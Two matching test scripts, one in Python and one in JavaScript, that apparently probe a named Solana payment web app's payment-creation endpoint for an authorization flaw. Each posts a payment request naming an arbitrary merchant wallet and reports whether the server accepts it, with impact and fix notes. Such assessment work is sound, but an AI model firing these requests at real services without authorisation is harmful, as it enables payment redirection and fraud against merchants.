File: test_authz_vuln_02.py
#!/usr/bin/env python3
"""
AUTHZ-VULN-02 Test: Unauthorized Merchant Wallet Manipulation
Tests if POST /api/payments/create accepts arbitrary merchant wallet addresses
without proper signature verification.
"""

import requests
import json

def test_authz_vuln_02():
    print("=" * 70)
    print("AUTHZ-VULN-02: Unauthorized Merchant Wallet Manipulation Test")
    print("=" * 70)
    print()

    # Test configuration
    target_url = "https://solana-blik.vercel.app/api/payments/create"

    # Arbitrary merchant wallet (system program ID - clearly not our wallet)
    test_payload = {
        "amount": 1.5,
        "merchantWallet": "11111111111111111111111111111111"
    }

    headers = {
        "Content-Type": "application/json"
    }

    print(f"Target URL: {target_url}")
    print(f"Method: POST")
    print(f"Headers: {headers}")
    print(f"Request Body:")
    print(json.dumps(test_payload, indent=2))
    print()
    print("-" * 70)
    print("Executing request...")
    print("-" * 70)
    print()

    try:
        # Make the POST request
        response = requests.post(
            target_url,
            json=test_payload,
            headers=headers,
            timeout=10
        )

        # Print results
        print(f"Status Code: {response.status_code}")
        print()
        print("Response Headers:")
        for header, value in response.headers.items():
            print(f"  {header}: {value}")
        print()

        print("Response Body:")
        try:
            response_json = response.json()
            print(json.dumps(response_json, indent=2))
        except:
            print(response.text)

        print()
        print("=" * 70)
        print("VULNERABILITY ASSESSMENT")
        print("=" * 70)

        # Analyze the response
        if response.status_code == 200:
            try:
                response_data = response.json()
                if "paymentId" in response_data and "status" in response_data:
                    print("Status: VULNERABLE ⚠️")
                    print()
                    print("Finding:")
                    print("  The endpoint accepted an arbitrary merchant wallet address")
                    print("  without proper authorization or signature verification.")
                    print()
                    print("Evidence:")
                    print(f"  - Received HTTP 200 OK")
                    print(f"  - Payment ID created: {response_data.get('paymentId')}")
                    print(f"  - Payment status: {response_data.get('status')}")
                    print()
                    print("Impact:")
                    print("  An attacker can create payment requests impersonating ANY")
                    print("  merchant wallet address, potentially redirecting funds to")
                    print("  unauthorized wallets.")
                    print()
                    print("Recommendation:")
                    print("  Implement signature verification to ensure only the owner")
                    print("  of a wallet can create payments for that wallet address.")
                else:
                    print("Status: UNEXPECTED RESPONSE")
                    print("Response does not match expected vulnerable pattern.")
            except:
                print("Status: UNEXPECTED RESPONSE")
                print("Unable to parse JSON response.")
        elif response.status_code == 400:
            print("Status: POTENTIALLY PATCHED ✓")
            print()
            print("The endpoint rejected the request with HTTP 400.")
            print("This suggests validation or authorization checks may be in place.")
        elif response.status_code == 401 or response.status_code == 403:
            print("Status: PATCHED ✓")
            print()
            print("The endpoint properly rejected unauthorized merchant wallet.")
        else:
            print(f"Status: UNEXPECTED ({response.status_code})")
            print("Received unexpected status code.")

    except requests.exceptions.RequestException as e:
        print(f"Error: Request failed - {str(e)}")
        print()
        print("Status: UNABLE TO TEST")

    print("=" * 70)

if __name__ == "__main__":
    test_authz_vuln_02()

File: test_authz_vuln_02.js
#!/usr/bin/env node
/**
 * AUTHZ-VULN-02 Test: Unauthorized Merchant Wallet Manipulation
 * Tests if POST /api/payments/create accepts arbitrary merchant wallet addresses
 * without proper signature verification.
 */

const https = require('https');

function testAuthzVuln02() {
    console.log("=".repeat(70));
    console.log("AUTHZ-VULN-02: Unauthorized Merchant Wallet Manipulation Test");
    console.log("=".repeat(70));
    console.log();

    // Test configuration
    const targetUrl = "https://solana-blik.vercel.app/api/payments/create";

    // Arbitrary merchant wallet (system program ID - clearly not our wallet)
    const testPayload = {
        amount: 1.5,
        merchantWallet: "11111111111111111111111111111111"
    };

    const postData = JSON.stringify(testPayload);

    console.log(`Target URL: ${targetUrl}`);
    console.log(`Method: POST`);
    console.log(`Request Body:`);
    console.log(JSON.stringify(testPayload, null, 2));
    console.log();
    console.log("-".repeat(70));
    console.log("Executing request...");
    console.log("-".repeat(70));
    console.log();

    const options = {
        hostname: 'solana-blik.vercel.app',
        path: '/api/payments/create',
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Content-Length': Buffer.byteLength(postData)
        }
    };

    const req = https.request(options, (res) => {
        let responseBody = '';

        console.log(`Status Code: ${res.statusCode}`);
        console.log();
        console.log("Response Headers:");
        Object.entries(res.headers).forEach(([key, value]) => {
            console.log(`  ${key}: ${value}`);
        });
        console.log();

        res.on('data', (chunk) => {
            responseBody += chunk;
        });

        res.on('end', () => {
            console.log("Response Body:");
            try {
                const responseJson = JSON.parse(responseBody);
                console.log(JSON.stringify(responseJson, null, 2));
                analyzeResponse(res.statusCode, responseJson);
            } catch (e) {
                console.log(responseBody);
                analyzeResponse(res.statusCode, responseBody);
            }
        });
    });

    req.on('error', (e) => {
        console.error(`Error: Request failed - ${e.message}`);
        console.log();
        console.log("Status: UNABLE TO TEST");
        console.log("=".repeat(70));
    });

    req.write(postData);
    req.end();
}

function analyzeResponse(statusCode, responseData) {
    console.log();
    console.log("=".repeat(70));
    console.log("VULNERABILITY ASSESSMENT");
    console.log("=".repeat(70));

    if (statusCode === 200) {
        if (typeof responseData === 'object' && responseData.paymentId && responseData.status) {
            console.log("Status: VULNERABLE ⚠️");
            console.log();
            console.log("Finding:");
            console.log("  The endpoint accepted an arbitrary merchant wallet address");
            console.log("  without proper authorization or signature verification.");
            console.log();
            console.log("Evidence:");
            console.log(`  - Received HTTP 200 OK`);
            console.log(`  - Payment ID created: ${responseData.paymentId}`);
            console.log(`  - Payment status: ${responseData.status}`);
            console.log();
            console.log("Impact:");
            console.log("  An attacker can create payment requests impersonating ANY");
            console.log("  merchant wallet address, potentially redirecting funds to");
            console.log("  unauthorized wallets.");
            console.log();
            console.log("Recommendation:");
            console.log("  Implement signature verification to ensure only the owner");
            console.log("  of a wallet can create payments for that wallet address.");
        } else {
            console.log("Status: UNEXPECTED RESPONSE");
            console.log("Response does not match expected vulnerable pattern.");
        }
    } else if (statusCode === 400) {
        console.log("Status: POTENTIALLY PATCHED ✓");
        console.log();
        console.log("The endpoint rejected the request with HTTP 400.");
        console.log("This suggests validation or authorization checks may be in place.");
    } else if (statusCode === 401 || statusCode === 403) {
        console.log("Status: PATCHED ✓");
        console.log();
        console.log("The endpoint properly rejected unauthorized merchant wallet.");
    } else {
        console.log(`Status: UNEXPECTED (${statusCode})`);
        console.log("Received unexpected status code.");
    }

    console.log("=".repeat(70));
}

// Execute the test
testAuthzVuln02();
